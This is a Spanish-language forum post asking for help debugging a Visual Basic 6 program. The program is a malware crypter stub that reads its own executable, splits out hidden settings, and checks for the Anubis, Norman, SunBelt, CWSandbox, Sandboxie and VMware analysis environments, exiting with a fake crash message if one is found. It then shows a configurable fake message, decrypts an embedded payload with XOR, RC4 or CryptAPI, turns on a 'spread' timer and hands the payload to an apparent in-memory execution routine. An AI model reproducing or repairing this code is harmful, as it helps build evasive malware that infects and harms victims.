eh visitado muchos de los temas de aqui y no eh podido aun con el problema por eso es que necesito de su sabia ayuda y conocimientos.
el code es este
Código: Seleccionar todo
Sub Main()
Dim Yo As String, sData() As String, VariableU() As Byte, ArchivoDes As String
Dim Rc4 As New clsRC4, Xorr As New clsSimpleXOR, Crypt As New clsCryptAPI
Open App.Path & "\" & App.EXEName & ".exe" For Binary As 1
Yo = Space(LOF(1))
Get 1, , Yo
Close 1
sData() = Split(Yo, "·$%&")
If sData(5) = "si" Then
If Anubis = True Then
MsgBox "Caused exception at 0x44e85c", vbCritical, "Anubis sandbox"
End
End If
End If
If sData(6) = "si" Then
If App.Path = "C:\analyzer\scan" Then
MsgBox "Caused exception at 0x44e85c", vbCritical, "Norman sandbox"
End
End If
End If
'ya
If sData(7) = "si" Then
If App.Path & App.EXEName & ".exe" = "C:\file" Then
MsgBox "Caused exception at 0x44e85c", vbCritical, "SunBelt SandBox"
End
End If
End If
If sData(8) = "si" Then
If App.Path & App.EXEName & ".exe" = SystemDrive & ":\sample.exe" Then
MsgBox "Caused exception at 0x44e85c", vbCritical, "CW sandbox"
End
End If
End If
If sData(9) = "si" Then
If processk("SandboxieRpcSs.exe") = True Then
MsgBox "Caused exception at 0x44e85c", vbCritical, "Sandboxie"
End
End If
End If
If sData(9) = "si" Then
If processk("SandboxieDcomLaunch.exe") = True Then
MsgBox "Caused exception at 0x44e85c", vbCritical, "Sandboxie"
End
End If
End If
If sData(10) = "si" Then
If processk("VMwareTray.exe") = True Then
MsgBox "Caused exception at 0x44e85c", vbCritical, "VMware"
End
End If
End If
If sData(10) = "si" Then
If processk("VMwareService.exe") = True Then
MsgBox "Caused exception at 0x44e85c", vbCritical, "VMware"
End
End If
End If
If sData(10) = "si" Then
If processk("VMwareUser.exe") = True Then
MsgBox "Caused exception at 0x44e85c", vbCritical, "VMware"
End
End If
End If
If sData(11) = "si" Then
If Dir(Environ("appdata") & "\dat34.dat") = "" Then
Select Case sData(14)
Case "1"
MsgBox sData(13), vbCritical, sData(12)
Case "2"
MsgBox sData(13), vbInformation, sData(12)
Case "3"
MsgBox sData(13), vbExclamation, sData(12)
Case "4"
MsgBox sData(13), sData(12)
Case "5"
MsgBox sData(13), vbQuestion, sData(12)
End Select
Open Environ("appdata") & "\dat34.dat" For Binary As 1
Put 1, , "..."
Close 1
End If
End If
If sData(3) = "1" Then ArchivoDes = Xorr.DecryptString(sData(1), sData(2))
If sData(3) = "2" Then ArchivoDes = Rc4.DecryptString(sData(1), sData(2))
If sData(3) = "3" Then ArchivoDes = Crypt.DecryptString(sData(1), sData(2))
If sData(4) = "si" Then Form1.Timer1.Enabled = True
VariableU() = StrConv(ArchivoDes, vbFromUnicode)
' 1 = archivo
' 2 = key
' 3 = tipo
'4 = spread
'5 = anubiss
' 6 = norman
' 7 = sunbelt
' 8 = cww
' 9 = sandboxie
' 10 = vmware
' 11 = mensajeactived
'12 = titulo
'13 = mensaje
' 14 = icono
Call Module2.JDVFWEC(App.Path & "\" & App.EXEName & ".exe", VariableU, Command)
End Sub

dejo una imagen para que vean el error.
gracias de antemano.